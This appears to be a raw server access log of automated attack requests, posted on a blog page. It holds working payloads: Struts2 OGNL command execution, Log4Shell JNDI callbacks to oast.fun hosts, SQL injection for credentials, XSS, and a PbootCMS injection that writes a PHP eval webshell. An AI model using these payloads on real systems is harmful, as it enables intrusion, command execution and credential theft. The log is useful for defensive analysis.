2023/12/38:06:4727.151.28.177redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36
2023/12/38:06:4727.151.28.177redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/12/38:06:4727.151.28.177action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36
2023/12/38:06:4727.151.28.177action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/12/38:06:4727.151.28.177redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/12/314:32:3627.151.28.177uri={{228*|98|}}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/12/314:32:3627.151.28.177uri={{228*|98|}}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/12/321:39:1727.151.28.177url=%23{T(java.net.InetAddress).getByName(|clm1u763dlueb6ql2mig5wy17uhz8549f.oast.fun|)}&mgrDn=a&pwd=aMozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/12/323:25:1727.151.28.177clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/12/38:06:4727.151.28.177redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/12/38:18:0727.151.28.177response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36
2023/12/310:30:1927.151.28.177id=XNLiHe%25{128*128}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/12/314:39:1127.151.28.177_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36
2023/12/317:41:1027.151.28.177x=${jndi:ldap://${:-348}${:-463}.${hostName}.uri.clm1u763dlueb6ql2migj4girubh9go1w.oast.fun/a}Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36
2023/12/318:35:2927.151.28.177mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/12/47:56:3627.151.28.177username=${jndi:ldap://${:-473}${:-419}.${hostName}.username.clm1u763dlueb6ql2migj8qxxk3muchmw.oast.fun/test}&url=https://localhostMozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36
2023/12/49:43:3127.151.28.177id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}userMozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36
2023/12/49:57:3427.151.28.177{alert(document.domain)}Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/12/410:48:2727.151.28.177FSMSCommand=${jndi:ldap://${:-841}${:-338}.${hostName}.username.clm1u763dlueb6ql2migizo6mry65pjjc.oast.fun/buqEY}Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/12/411:40:4327.151.28.177room=${jndi:ldap://${:-655}${:-980}.${hostName}.username.clm1u763dlueb6ql2mige5gh644fqqhmt.oast.fun/gkt5c}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/12/412:14:5327.151.28.177url=${jndi:ldap://${:-794}${:-487}.${hostName}.url.clm1u763dlueb6ql2migtqkes49jmagfo.oast.fun}Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/12/412:35:1527.151.28.177=${jndi:ldap://${:-251}${:-252}.${hostName}.username.clm1u763dlueb6ql2migsyc5zciqrk7cw.oast.fun/8p3sZ}Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36
2023/12/2614:45:56222.112.82.143mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/12/2614:45:54222.112.82.143redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/12/2614:45:54222.112.82.143action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36
2023/12/2614:45:56222.112.82.143redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36
2023/12/2614:45:57222.112.82.143clientId={{id}}&timeout=500&wiki=xwikiMozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/12/2614:45:55222.112.82.143cat_id=${system(ls)}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/12/2614:45:54222.112.82.143response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36
2023/12/2614:45:54222.112.82.143redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/12/2614:45:54222.112.82.143action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/12/2614:45:54222.112.82.143url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/12/2614:45:54222.112.82.143id=KfT5hO%25{128*128}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36
2023/12/2614:45:54222.112.82.143search==%00{.cookie|RdkeZJ|value%3dCVE-2014-6287.}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36
2023/12/2614:45:55222.112.82.143redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 
2024/1/420:07:38202.61.85.92member/login/aaaaaa}{pboot:if(true);use/*|function/*|fputs/*|as/*|test;use/*|function/*|fopen/*|as/*|test1;use/*|function/*|get/*|as/*|test3;use/*|function/*|hex2bin/*|as/*|test4;test(test1(test3(|file|),|w|),test4(test3(|content|)));if(true)}{/pboot:if}&file=xm117.php&content=63346361343233386130623932333832306463633530396136663735383439623c7072653e3c626f64793e3c3f70687020636c617373204763453439334636207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244879354637297b20406576616c28222f2a5a4263363436395631382a2f222e2448793546372e2222293b207d7d6e657720476345343933463628245f524551554553545b2770617373275d293b6563686f206572726f723330333f3e3c2f626f64793e3c2f7072653eMozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0
2024/1/420:10:44202.61.85.92member/login/aaaaaa}{pboot:if(true);use/*|function/*|fputs/*|as/*|test;use/*|function/*|fopen/*|as/*|test1;use/*|function/*|get/*|as/*|test3;use/*|function/*|hex2bin/*|as/*|test4;test(test1(test3(|file|),|w|),test4(test3(|content|)));if(true)}{/pboot:if}&file=xm117.php&content=63346361343233386130623932333832306463633530396136663735383439623c7072653e3c626f64793e3c3f70687020636c617373204763453439334636207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244879354637297b20406576616c28222f2a5a4263363436395631382a2f222e2448793546372e2222293b207d7d6e657720476345343933463628245f524551554553545b2770617373275d293b6563686f206572726f723330333f3e3c2f626f64793e3c2f7072653eMozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0
2024/1/420:16:51202.61.85.92member/login/aaaaaa}{pboot:if(true);use/*|function/*|fputs/*|as/*|test;use/*|function/*|fopen/*|as/*|test1;use/*|function/*|get/*|as/*|test3;use/*|function/*|hex2bin/*|as/*|test4;test(test1(test3(|file|),|w|),test4(test3(|content|)));if(true)}{/pboot:if}&file=xm117.php&content=63346361343233386130623932333832306463633530396136663735383439623c7072653e3c626f64793e3c3f70687020636c617373204763453439334636207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244879354637297b20406576616c28222f2a5a4263363436395631382a2f222e2448793546372e2222293b207d7d6e657720476345343933463628245f524551554553545b2770617373275d293b6563686f206572726f723330333f3e3c2f626f64793e3c2f7072653eMozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值